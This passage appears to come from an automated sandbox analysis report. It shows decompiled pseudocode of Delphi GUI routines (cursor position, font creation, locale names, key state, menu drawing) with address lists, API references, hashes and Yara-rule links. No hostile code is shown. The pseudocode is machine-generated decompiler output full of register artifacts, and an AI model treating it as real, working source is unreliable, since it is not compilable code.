				intOrPtr _t65;
				intOrPtr _t71;
				intOrPtr _t74;
				intOrPtr _t88;
				intOrPtr _t105;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t120;
				intOrPtr _t123;
				intOrPtr _t124;
				intOrPtr _t129;
				void* _t133;
				intOrPtr _t134;
				void* _t137;

				_t137 = __fp0;
				_v8 = __ecx;
				_t88 = __edx;
				_t124 = __eax;
				 *0x48fb80 = __eax;
				_push(_t133);
				_push(0x4371b1);
				_push( *[fs:edx]);
				 *[fs:edx] = _t134;
				_v12 = 0;
				 *0x48fb88 = 0;
				_t135 =  *((char*)(__eax + 0x9b));
				if( *((char*)(__eax + 0x9b)) != 0) {
					E004037B0(__eax, __eflags);
					__eflags =  *0x48fb80;
					if( *0x48fb80 != 0) {
						__eflags = _v12;
						if(_v12 == 0) {
							_v12 = E004363E8(1, _t124);
							 *0x48fb88 = 1;
						}
						_t128 =  *((intOrPtr*)(_v12 + 0x38));
						_t105 =  *0x434e14; // 0x434e60
						_t54 = E00403740( *((intOrPtr*)(_v12 + 0x38)), _t105);
						__eflags = _t54;
						if(_t54 == 0) {
							_t129 =  *((intOrPtr*)(_v12 + 0x38));
							__eflags =  *((intOrPtr*)(_t129 + 0x30));
							if( *((intOrPtr*)(_t129 + 0x30)) != 0) {
								L14:
								__eflags = 0;
								E00412A88(0,  &_v36, 0);
								E004387D4(_t129,  &_v28,  &_v36);
								_t60 = _v12;
								 *((intOrPtr*)(_t60 + 0x44)) = _v28;
								 *((intOrPtr*)(_t60 + 0x48)) = _v24;
								L15:
								__eflags =  *(_v12 + 0x44) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x48));
								E00412A88( *(_v12 + 0x44) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x48)),  &_v28,  *((intOrPtr*)(_v12 + 0x48)) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x4c)));
								_t65 = _v12;
								 *((intOrPtr*)(_t65 + 0x4c)) = _v28;
								 *((intOrPtr*)(_t65 + 0x50)) = _v24;
								goto L16;
							}
							_t116 =  *0x434e14; // 0x434e60
							_t71 = E00403740(_t129, _t116);
							__eflags = _t71;
							if(_t71 != 0) {
								goto L14;
							}
							GetCursorPos( &_v20);
							_t74 = _v12;
							 *(_t74 + 0x44) = _v20.x;
							 *((intOrPtr*)(_t74 + 0x48)) = _v20.y;
							goto L15;
						} else {
							GetWindowRect(E0043F370(_t128), _v12 + 0x44);
							L16:
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							L17:
							E00436E9C(_v12, _v8, _t88, _t133, _t137);
							_pop(_t115);
							 *[fs:eax] = _t115;
							return 0;
						}
					}
					_pop(_t120);
					 *[fs:eax] = _t120;
					return 0;
				}
				E004037B0(__eax, _t135);
				if( *0x48fb80 != 0) {
					__eflags = _v12;
					if(_v12 == 0) {
						_v12 = E004362D0(_t124, 1);
						 *0x48fb88 = 1;
					}
					goto L17;
				}
				_pop(_t123);
				 *[fs:eax] = _t123;
				return 0;
			}

0x0043700c
0x00437015
0x00437018
0x0043701a
0x0043701c
0x00437024
0x00437025
0x0043702a
0x0043702d
0x00437032
0x00437035
0x0043703c
0x00437043
0x00437099
0x0043709e
0x004370a5
0x004370b4
0x004370b8
0x004370c8
0x004370cb
0x004370cb
0x004370d5
0x004370da
0x004370e0
0x004370e5
0x004370e7
0x00437105
0x00437108
0x0043710c
0x00437139
0x0043713e
0x00437140
0x0043714d
0x00437152
0x00437158
0x0043715e
0x00437161
0x00437173
0x00437179
0x0043717e
0x00437184
0x0043718a
0x00000000
0x0043718a
0x00437110
0x00437116
0x0043711b
0x0043711d
0x00000000
0x00000000
0x00437123
0x00437128
0x0043712e
0x00437134
0x00000000
0x004370e9
0x004370f8
0x0043718d
0x00437196
0x00437197
0x00437198
0x00437199
0x0043719a
0x004371a2
0x004371a9
0x004371ac
0x00000000
0x004371ac
0x004370e7
0x004370a9
0x004370ac
0x00000000
0x004370ac
0x0043704e
0x0043705a
0x00437069
0x0043706d
0x00437081
0x00437084
0x00437084
0x00000000
0x0043706d
0x0043705e
0x00437061
0x00000000

Strings

`NC, xrefs: 004370DA, 00437110

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: `NC
API String ID: 0-918118547
Opcode ID: 1b16747acd1b17efe7daa8821fdcd99be8489570ab319eef6596d1cb0d868ad7
Instruction ID: aaebfc5350d81313ac95865dd7c310d1e1bc178e180e2a18a4a74c2a203f4d4a
Opcode Fuzzy Hash: 1b16747acd1b17efe7daa8821fdcd99be8489570ab319eef6596d1cb0d868ad7
Instruction Fuzzy Hash: F051B4B5A046099FCB10CF99D881A9EBBF5FF8C314F1090AAE840A7351D779AD85CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041EFE0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0041EFE0(void* __eax, void* __ebx, void* __ecx) {
				signed int _v8;
				struct tagLOGFONTA _v68;
				char _v72;
				char _v76;
				char _v80;
				intOrPtr _t76;
				intOrPtr _t81;
				void* _t107;
				void* _t116;
				intOrPtr _t126;
				void* _t137;
				void* _t138;
				intOrPtr _t139;

				_t137 = _t138;
				_t139 = _t138 + 0xffffffb4;
				_v80 = 0;
				_v76 = 0;
				_v72 = 0;
				_t116 = __eax;
				_push(_t137);
				_push(0x41f169);
				_push( *[fs:eax]);
				 *[fs:eax] = _t139;
				_v8 =  *((intOrPtr*)(__eax + 0x10));
				if( *((intOrPtr*)(_v8 + 8)) != 0) {
					 *[fs:eax] = 0;
					_push(E0041F170);
					return E00404344( &_v80, 3);
				} else {
					_t76 =  *0x48fa74; // 0x2130ad8
					E0041E364(_t76);
					_push(_t137);
					_push(0x41f141);
					_push( *[fs:eax]);
					 *[fs:eax] = _t139;
					if( *((intOrPtr*)(_v8 + 8)) == 0) {
						_v68.lfHeight =  *(_v8 + 0x14);
						_v68.lfWidth = 0;
						_v68.lfEscapement = 0;
						_v68.lfOrientation = 0;
						if(( *(_v8 + 0x19) & 0x00000001) == 0) {
							_v68.lfWeight = 0x190;
						} else {
							_v68.lfWeight = 0x2bc;
						}
						_v68.lfItalic = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000002) != 0x00000000;
						_v68.lfUnderline = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000004) != 0x00000000;
						_v68.lfStrikeOut = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000008) != 0x00000000;
						_v68.lfCharSet =  *((intOrPtr*)(_v8 + 0x1a));
						E0040457C( &_v72, _v8 + 0x1b);
						if(E00408598(_v72, "Default") != 0) {
							E0040457C( &_v80, _v8 + 0x1b);
							E00408C10( &(_v68.lfFaceName), _v80);
						} else {
							E0040457C( &_v76, "\rMS Sans Serif");
							E00408C10( &(_v68.lfFaceName), _v76);
						}
						_v68.lfQuality = 0;
						_v68.lfOutPrecision = 0;
						_v68.lfClipPrecision = 0;
						_t107 = E0041F2C4(_t116) - 1;
						if(_t107 == 0) {
							_v68.lfPitchAndFamily = 2;
						} else {
							if(_t107 == 1) {
								_v68.lfPitchAndFamily = 1;
							} else {
								_v68.lfPitchAndFamily = 0;
							}
						}
						 *((intOrPtr*)(_v8 + 8)) = CreateFontIndirectA( &_v68);
					}
					_pop(_t126);
					 *[fs:eax] = _t126;
					_push(0x41f148);
					_t81 =  *0x48fa74; // 0x2130ad8
					return E0041E370(_t81);
				}
			}

0x0041efe1
0x0041efe3
0x0041efe9
0x0041efec
0x0041efef
0x0041eff2
0x0041eff6
0x0041eff7
0x0041effc
0x0041efff
0x0041f005
0x0041f00f
0x0041f153
0x0041f156
0x0041f168
0x0041f015
0x0041f015
0x0041f01a
0x0041f021
0x0041f022
0x0041f027
0x0041f02a
0x0041f034
0x0041f040
0x0041f045
0x0041f04a
0x0041f04f
0x0041f059
0x0041f064
0x0041f05b
0x0041f05b
0x0041f05b
0x0041f075
0x0041f082
0x0041f08f
0x0041f098
0x0041f0a4
0x0041f0b8
0x0041f0dd
0x0041f0e8
0x0041f0ba
0x0041f0c2
0x0041f0cd
0x0041f0cd
0x0041f0ed
0x0041f0f1
0x0041f0f5
0x0041f100
0x0041f102
0x0041f10a
0x0041f104
0x0041f106
0x0041f110
0x0041f108
0x0041f116
0x0041f116
0x0041f106
0x0041f126
0x0041f126
0x0041f12b
0x0041f12e
0x0041f131
0x0041f136
0x0041f140
0x0041f140

APIs

Part of subcall function 0041E364: RtlEnterCriticalSection.KERNEL32(?,0041E3A1), ref: 0041E368

CreateFontIndirectA.GDI32(?), ref: 0041F11E

Strings

MS Sans Serif, xrefs: 0041F0BD
Default, xrefs: 0041F0AC

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateCriticalEnterFontIndirectSection
String ID: MS Sans Serif$Default
API String ID: 2931345757-2137701257
Opcode ID: 90fb9a7503d66cdec542eb113d889876bd6839152fc7b273cb32d0b05a32b6e9
Instruction ID: c2368e3b638b58a3088947372bbf6b66c6b3ddf4e0586a3ea95e9af463785673
Opcode Fuzzy Hash: 90fb9a7503d66cdec542eb113d889876bd6839152fc7b273cb32d0b05a32b6e9
Instruction Fuzzy Hash: A0514275A04248DFDB01CFA9C541BCDBBF5AF49304F6580BAD804A7352D3789E4ADB29

Uniqueness

Uniqueness Score: -1.00%

Function 004099F0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 106
threadCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E004099F0(void* __ebx, void* __edi, void* __esi) {
				int _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				void* _t53;
				void* _t54;
				intOrPtr _t80;
				void* _t83;
				void* _t84;
				void* _t86;
				void* _t87;
				intOrPtr _t90;

				_t89 = _t90;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(_t90);
				_push(0x409b03);
				_push( *[fs:eax]);
				 *[fs:eax] = _t90;
				_v8 = GetThreadLocale();
				_t53 = 1;
				_t86 = 0x48f758;
				_t83 = 0x48f788;
				do {
					_t3 = _t53 + 0x44; // 0x45
					E004099B4(_t3 - 1, _t53 - 1,  &_v16, 0xb, _t89);
					E00404374(_t86, _v16);
					_t6 = _t53 + 0x38; // 0x39
					E004099B4(_t6 - 1, _t53 - 1,  &_v20, 0xb, _t89);
					E00404374(_t83, _v20);
					_t53 = _t53 + 1;
					_t83 = _t83 + 4;
					_t86 = _t86 + 4;
				} while (_t53 != 0xd);
				_t54 = 1;
				_t87 = 0x48f7b8;
				_t84 = 0x48f7d4;
				do {
					_t8 = _t54 + 5; // 0x6
					asm("cdq");
					_v12 = _t8 % 7;
					E004099B4(_v12 + 0x31, _t54 - 1,  &_v24, 6, _t89);
					E00404374(_t87, _v24);
					E004099B4(_v12 + 0x2a, _t54 - 1,  &_v28, 6, _t89);
					E00404374(_t84, _v28);
					_t54 = _t54 + 1;
					_t84 = _t84 + 4;
					_t87 = _t87 + 4;
				} while (_t54 != 8);
				_pop(_t80);
				 *[fs:eax] = _t80;
				_push(E00409B0A);
				return E00404344( &_v28, 4);
			}

0x004099f1
0x004099f5
0x004099f6
0x004099f7
0x004099f8
0x004099f9
0x004099fa
0x00409a00
0x00409a01
0x00409a06
0x00409a09
0x00409a11
0x00409a14
0x00409a19
0x00409a1e
0x00409a23
0x00409a32
0x00409a36
0x00409a41
0x00409a55
0x00409a59
0x00409a64
0x00409a69
0x00409a6a
0x00409a6d
0x00409a70
0x00409a75
0x00409a7a
0x00409a7f
0x00409a84
0x00409a84
0x00409a8c
0x00409a8f
0x00409aa7
0x00409ab2
0x00409acc
0x00409ad7
0x00409adc
0x00409add
0x00409ae0
0x00409ae3
0x00409aea
0x00409aed
0x00409af0
0x00409b02

APIs

GetThreadLocale.KERNEL32(00000000,00409B03,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409A0C

Strings

u@, xrefs: 00409A4D
Hv@, xrefs: 00409A99

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: LocaleThread
String ID: Hv@$u@
API String ID: 635194068-936226909
Opcode ID: 8a0450575a709c70558e9ba436eac5fd5543703d4a1339eaa992137f609c94cf
Instruction ID: b1c6a070fb8b54ce91781ebc80038fc09ae59b0137980c5015c0edec2bc75e21
Opcode Fuzzy Hash: 8a0450575a709c70558e9ba436eac5fd5543703d4a1339eaa992137f609c94cf
Instruction Fuzzy Hash: 9E31B675F001085BD704DA59D881AAE77A9EB89314F65843BEA09EB382D73CAD058768

Uniqueness

Uniqueness Score: -1.00%

Function 0044C050, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0044C050(intOrPtr __eax, void* __edx) {
				char _v8;
				signed short _v10;
				intOrPtr _v16;
				char _v17;
				char _v24;
				intOrPtr _t34;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t48;
				void* _t51;
				intOrPtr _t64;
				intOrPtr _t67;
				void* _t69;
				void* _t71;
				intOrPtr _t72;

				_t69 = _t71;
				_t72 = _t71 + 0xffffffec;
				_t51 = __edx;
				_v16 = __eax;
				_v10 =  *((intOrPtr*)(__edx + 4));
				if(_v10 == 0) {
					return 0;
				} else {
					if(GetKeyState(0x10) < 0) {
						_v10 = _v10 + 0x2000;
					}
					if(GetKeyState(0x11) < 0) {
						_v10 = _v10 + 0x4000;
					}
					if(( *(_t51 + 0xb) & 0x00000020) != 0) {
						_v10 = _v10 + 0x8000;
					}
					_v24 =  *((intOrPtr*)(_v16 + 0x34));
					_t34 =  *0x48fbf0; // 0x2130e50
					E004267AC(_t34,  &_v24);
					_push(_t69);
					_push(0x44c14e);
					_push( *[fs:eax]);
					 *[fs:eax] = _t72;
					while(1) {
						_v17 = 0;
						_v8 = E0044BD54(_v16, 2, _v10 & 0x0000ffff);
						if(_v8 != 0) {
							break;
						}
						if(_v24 == 0 || _v17 != 2) {
							_pop(_t64);
							 *[fs:eax] = _t64;
							_push(0x44c155);
							_t40 =  *0x48fbf0; // 0x2130e50
							return E004267A4(_t40);
						} else {
							continue;
						}
						goto L14;
					}
					_t42 =  *0x48fbf0; // 0x2130e50
					E004267AC(_t42,  &_v8);
					_push(_t69);
					_push(0x44c123);
					_push( *[fs:eax]);
					 *[fs:eax] = _t72;
					_v17 = E0044BEFC( &_v8, 0, _t69);
					_pop(_t67);
					 *[fs:eax] = _t67;
					_push(0x44c12a);
					_t48 =  *0x48fbf0; // 0x2130e50
					return E004267A4(_t48);
				}
				L14:
			}

0x0044c051
0x0044c053
0x0044c057
0x0044c059
0x0044c063
0x0044c06c
0x0044c16b
0x0044c072
0x0044c07c
0x0044c07e
0x0044c07e
0x0044c08e
0x0044c090
0x0044c090
0x0044c09a
0x0044c09c
0x0044c09c
0x0044c0a8
0x0044c0ae
0x0044c0b3
0x0044c0ba
0x0044c0bb
0x0044c0c0
0x0044c0c3
0x0044c0c6
0x0044c0c6
0x0044c0d8
0x0044c0df
0x00000000
0x00000000
0x0044c12e
0x0044c138
0x0044c13b
0x0044c13e
0x0044c143
0x0044c14d
0x00000000
0x00000000
0x00000000
0x00000000
0x0044c12e
0x0044c0e4
0x0044c0e9
0x0044c0f0
0x0044c0f1
0x0044c0f6
0x0044c0f9
0x0044c108
0x0044c10d
0x0044c110
0x0044c113
0x0044c118
0x0044c122
0x0044c122
0x00000000

APIs

GetKeyState.USER32(00000010), ref: 0044C074
GetKeyState.USER32(00000011), ref: 0044C086

Strings

, xrefs: 0044C096

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: State
String ID:
API String ID: 1649606143-3916222277
Opcode ID: 2b31a51c91225219f7195cdf30feb6174b5ac6c9bf5e3b0e0d172c8c72ed0b58
Instruction ID: f18d7a24cf68b6f9e41b31e0846b9d47448a22b237d844201d9950864949798d
Opcode Fuzzy Hash: 2b31a51c91225219f7195cdf30feb6174b5ac6c9bf5e3b0e0d172c8c72ed0b58
Instruction Fuzzy Hash: 60312934A05304EFEB11DFA9E89179EB7F5EB44304F5584BAEC00A7291E7785E00CA58

Uniqueness

Uniqueness Score: -1.00%

Function 0044BE10, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0044BE10(void* __eax, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				intOrPtr* _t27;
				intOrPtr _t29;
				void* _t39;
				intOrPtr _t42;
				intOrPtr _t45;
				int _t50;
				void* _t51;

				_t51 = __eax;
				_t39 = 0;
				_t50 = E0044BD54(__eax, 1, __edx);
				if(_t50 == 0) {
					if(( *(_t51 + 0x1c) & 0x00000010) == 0) {
						_t45 =  *0x447c9c; // 0x447ce8
						if(E00403740(_t51, _t45) != 0) {
							E0044AE28( *((intOrPtr*)(_t51 + 0x34)));
						}
					}
				} else {
					if(( *(_t50 + 0x1c) & 0x00000010) == 0) {
						E0044AE28(_t50);
					}
					 *((intOrPtr*)( *_t50 + 0x44))();
					_t24 = E0044B4C0(_t50, _t39, 0, _t50, _t51);
					if((_t24 | E0044B9BC(_t50, 0)) != 0) {
						E00448E98(_t50, 0);
					}
					_t27 =  *0x48e6ec; // 0x48fbfc
					_t29 =  *((intOrPtr*)( *_t27 + 0x44));
					if(_t29 != 0) {
						_t42 = _t29;
						if( *((char*)(_t42 + 0x22f)) == 2 && _t50 ==  *((intOrPtr*)(_t42 + 0x258)) && SendMessageA( *(_t42 + 0x254), 0x234, 0, 0) != 0) {
							DrawMenuBar(E0043F370(_t42));
						}
					}
					_t39 = 1;
				}
				return _t39;
			}

0x0044be13
0x0044be15
0x0044be20
0x0044be24
0x0044beb4
0x0044beb8
0x0044bec5
0x0044beca
0x0044beca
0x0044bec5
0x0044be2a
0x0044be2e
0x0044be32
0x0044be32
0x0044be3b
0x0044be42
0x0044be56
0x0044be5a
0x0044be5a
0x0044be5f
0x0044be66
0x0044be6b
0x0044be73
0x0044be7c
0x0044bea7
0x0044bea7
0x0044be7c
0x0044beac
0x0044beac
0x0044bed4

APIs

SendMessageA.USER32 ref: 0044BE96
DrawMenuBar.USER32(00000000,?,00000234,00000000,00000000), ref: 0044BEA7

Strings

|D, xrefs: 0044BEB8

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: DrawMenuMessageSend
String ID: |D
API String ID: 2625368238-369764335
Opcode ID: 70dfe488819a9491418697602775c2a484eae7f937bf019f87f482e07ef9934c
Instruction ID: dad02bc1c52e2e342e2c386163c0c1e1ac5888164989db89b463077781986b60
Opcode Fuzzy Hash: 70dfe488819a9491418697602775c2a484eae7f937bf019f87f482e07ef9934c
Instruction Fuzzy Hash: B91172717006004BE711EA3A8C8579A67969FC9308F28447ABA04DB392DB7CEC0687C9

Uniqueness

Uniqueness Score: -1.00%

Function 00439078, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00439078(void* __eflags, intOrPtr _a4) {
				char _v5;
				struct tagRECT _v21;
				struct tagRECT _v40;
				void* _t40;
				void* _t45;

				_v5 = 1;
				_t44 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198));
				_t45 = E0041412C( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198)),  *((intOrPtr*)(_a4 - 4)));
				if(_t45 <= 0) {
					L5:
					_v5 = 0;
				} else {
					do {
						_t45 = _t45 - 1;
						_t40 = E004140D0(_t44, _t45);
						if( *((char*)(_t40 + 0x57)) == 0 || ( *(_t40 + 0x50) & 0x00000040) == 0) {
							goto L4;
						} else {
							E0043865C(_t40,  &_v40);
							IntersectRect( &_v21, _a4 + 0xffffffec,  &_v40);
							if(EqualRect( &_v21, _a4 + 0xffffffec) == 0) {
								goto L4;
							}
						}
						goto L6;
						L4:
					} while (_t45 > 0);
					goto L5;
				}
				L6:
				return _v5;
			}

0x00439081
0x0043908e
0x004390a1
0x004390a5
0x004390f5
0x004390f5
0x004390a7
0x004390a7
0x004390a7
0x004390b1
0x004390b7
0x00000000
0x004390bf
0x004390c4
0x004390d8
0x004390ef
0x00000000
0x00000000
0x004390ef
0x00000000
0x004390f1
0x004390f1
0x00000000
0x004390a7
0x004390f9
0x00439102

APIs

IntersectRect.USER32 ref: 004390D8
EqualRect.USER32 ref: 004390E8

Strings

@, xrefs: 004390B9

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$EqualIntersect
String ID: @
API String ID: 3291753422-2766056989
Opcode ID: 85263df399f3c055a5ac233aa09b8fac6764581a626922a7c32205e358554927
Instruction ID: b3658ca63b3f77c0b2e9cb8c915faf6aaf92240209934cfd59e43f7126a4f57e
Opcode Fuzzy Hash: 85263df399f3c055a5ac233aa09b8fac6764581a626922a7c32205e358554927
Instruction Fuzzy Hash: C1115E31A042485BC711DAADC885BDFBBE89F49318F044296FD05EB382D7B9DE4987D4

Uniqueness

Uniqueness Score: -1.00%

Function 00426B14, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00426B14(intOrPtr* _a4, signed int _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t14;
				intOrPtr _t16;
				signed int _t17;
				void* _t18;
				void* _t19;

				_t17 = _a8;
				_t14 = _a4;
				if( *0x48fabe != 0) {
					_t19 = 0;
					if((_t17 & 0x00000003) != 0 ||  *((intOrPtr*)(_t14 + 8)) > 0 &&  *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) >  *_t14 && GetSystemMetrics(1) >  *((intOrPtr*)(_t14 + 4))) {
						_t19 = 0x12340042;
					}
				} else {
					_t16 =  *0x48fa9c; // 0x426b14
					 *0x48fa9c = E004269A4(2, _t14, _t16, _t17, _t18);
					_t19 =  *0x48fa9c(_t14, _t17);
				}
				return _t19;
			}

0x00426b1a
0x00426b1d
0x00426b27
0x00426b4c
0x00426b55
0x00426b7c
0x00426b7c
0x00426b29
0x00426b2e
0x00426b3b
0x00426b48
0x00426b48
0x00426b87

APIs

GetSystemMetrics.USER32 ref: 00426B65
GetSystemMetrics.USER32 ref: 00426B71

Part of subcall function 004269A4: GetProcAddress.KERNEL32(74EA0000,00000000), ref: 00426A24

Strings

MonitorFromRect, xrefs: 00426B29

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsSystem$AddressProc
String ID: MonitorFromRect
API String ID: 1792783759-4033241945
Opcode ID: 1c0b52c7aa5e9bb5f014eafe9e8f2203fc25de002f4f753f59633a2db975ffaa
Instruction ID: 6ec67903faf7042e990e768622a164a314714ab173c30a0d504f61f69f203353
Opcode Fuzzy Hash: 1c0b52c7aa5e9bb5f014eafe9e8f2203fc25de002f4f753f59633a2db975ffaa
Instruction Fuzzy Hash: 8501A2327001369BDB108B44F886B1ABB55D740775F85847BED0CCBA02C778EC448BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00440D80, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00440D80(void* __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, char _a4) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				void* _t22;
				void* _t28;

				_v8 = __ecx;
				_t28 = __eax;
				_t22 = 0;
				if(E00445BB0(__eax) != 0) {
					_t32 = __edx -  *((intOrPtr*)(_t28 + 0x6c));
					if(__edx !=  *((intOrPtr*)(_t28 + 0x6c))) {
						E00440DE4(_t28, _t32);
						 *((intOrPtr*)(_t28 + 0x6c)) = __edx;
						_t5 =  &_a4; // 0x436d78
						E00440B70(__edx,  *_t5, _v8,  &_v16);
						_t7 =  &_v12; // 0x436d78
						_push( *_t7);
						_push(_v16);
						_push( *((intOrPtr*)(_t28 + 0x6c)));
						L0042691C();
						asm("sbb ebx, ebx");
						_t22 = __edx + 1;
					}
				}
				return _t22;
			}

0x00440d89
0x00440d8e
0x00440d90
0x00440d9b
0x00440d9d
0x00440da0
0x00440da4
0x00440dab
0x00440db2
0x00440dba
0x00440dbf
0x00440dc2
0x00440dc6
0x00440dca
0x00440dcb
0x00440dd3
0x00440dd5
0x00440dd5
0x00440da0
0x00440dde

APIs

Part of subcall function 00440DE4: 73D618F0.COMCTL32(?,00000000,00440DA9,00000000,00000000,00000000), ref: 00440DFC

Part of subcall function 00440B70: ClientToScreen.USER32(?,00440E2C), ref: 00440B88
Part of subcall function 00440B70: GetWindowRect.USER32 ref: 00440B92

73D61850.COMCTL32(?,?,xmC,?,00000000,00000000,00000000), ref: 00440DCB

Strings

xmC, xrefs: 00440DB2
xmC, xrefs: 00440DBF, 00440DC2

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientD618D61850RectScreenWindow
String ID: xmC$xmC
API String ID: 2312016067-2749791086
Opcode ID: 54bd9ec976ea2e778cc55838d3fda6531665e7fa2c232a98364c7cff0efd7e8f
Instruction ID: 470f62bafd84657a7bf07c7114de4341cdf3a7ae99cd49e90459aeb749180ee4
